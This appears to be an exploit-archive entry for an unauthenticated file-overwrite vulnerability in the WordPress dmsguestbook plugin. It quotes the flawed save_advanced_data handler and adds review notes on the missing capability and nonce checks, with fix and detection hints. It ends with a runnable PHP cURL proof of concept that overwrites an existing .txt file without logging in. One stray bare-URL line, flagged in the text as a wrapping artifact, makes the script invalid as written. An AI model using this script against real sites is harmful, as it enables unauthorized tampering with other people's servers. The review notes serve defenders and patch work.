WordPress Dmsguestbook Unauthenticated Data Injection



EKU-ID: 4467 CVE: OSVDB-ID:
Author: Evex Published: 2014-12-30 Verified: Verified


http://packetstormsecurity.com/user/evex/
Author:Evex
Title:
WordPress dmsguestbook Plugin File Manipulation
Description:
The WordPress dmsguestbook plugin is vulnerable to a file manipulation security issue: it allows an unauthenticated attacker to put text into existing text files only.
<?php
// Proof-of-concept request for the dmsguestbook "save_advanced_data" handler.
// The handler as quoted by the author follows in the block comment; review
// notes on it come after the comment.
/*
Vulnerability Code:
    if ($POSTVARIABLE['action'] =='save_advanced_data') {

    $abspath = str_replace("\\","/", ABSPATH);

    // check the folder variable
    if($POSTVARIABLE['folder']=="language/"){
    $folder="language/";
    } else {$folder="";}

    // check the file variable xxxx.txt
    if(preg_match('/^[a-z0-9]+\.+(txt)/i', $POSTVARIABLE['file'])==1) {
    $file=$POSTVARIABLE['file'];
    } else {$file="";}

        clearstatcache();
        if (file_exists($abspath . "wp-content/plugins/dmsguestbook/" .
$folder . $file)) {
        $handle = fopen($abspath . "wp-content/plugins/dmsguestbook/" .
$folder . $file, "w");
        $writetofile = str_replace("\\", "",
$POSTVARIABLE['advanced_data']);
        fwrite($handle, $writetofile);
        fclose($handle);
        message("<b>" . __("saved", "dmsguestbook") . "...</b>",300,800);
        } else {message("<br /><b>" . __("File not found!", "dmsguestbook")
. "</b>",300,800);}
    }
*/
// Review notes on the quoted handler (defensive reading):
// - No capability check or nonce verification (e.g. current_user_can() /
//   check_admin_referer()) is visible in the excerpt before the write; the
//   posted fields are acted on directly, which is the root cause of the
//   unauthenticated access described above.
// - The allow-list limits $folder to "language/" or "" and $file to names
//   matching /^[a-z0-9]+\.+(txt)/i, and file_exists() requires the target to
//   already exist, so only existing .txt-named files under the plugin
//   directory are reachable (the pattern has no end anchor).
// - fopen(..., "w") truncates the target, so advanced_data replaces the whole
//   file. str_replace("\\", "", ...) only strips backslashes; it is neither a
//   content control nor an authorization check.
// - Fix direction: gate the handler on an administrator capability plus a
//   nonce and keep the file allow-list. Detection: POST requests to
//   wp-admin/admin.php?page=dmsguestbook carrying action=save_advanced_data
//   from a client that has not logged in as an administrator.

$TEXTTOINJECT = 'INPUT TEXT HERE'; // text placed into the advanced_data POST field
$TXTFILE = 'readme.txt'; #
// NOTE(review): the next line appears to be a wrapped continuation of the "#"
// comment above (a page line-break artifact); as written it is not valid PHP.
localhost/wp-content/plugins/dmsguestbook/readme.txt
$url = "http://localhost/x/wordpress"; // base URL of the WordPress install under test
$ch = curl_init();
curl_setopt($ch,CURLOPT_POST,true);
// Only three POST fields are sent (no "folder" field, so the handler's
// $folder falls back to ""). No cookie (CURLOPT_COOKIE) and no nonce field
// are attached: the request is made unauthenticated, as the description says.
curl_setopt($ch,CURLOPT_POSTFIELDS,"action=save_advanced_data&file=$TXTFILE&advanced_data=$TEXTTOINJECT");
curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
curl_setopt($ch,CURLOPT_URL,$url.'/wp-admin/admin.php?page=dmsguestbook');
curl_exec($ch); // the returned response body is discarded
// Prints the URL of the file whose contents should now have been replaced.
// Note the printed path hardcodes readme.txt rather than using $TXTFILE.
echo "Payload Sent\nUrl: $url/wp-content/plugins/dmsguestbook/readme.txt";
?>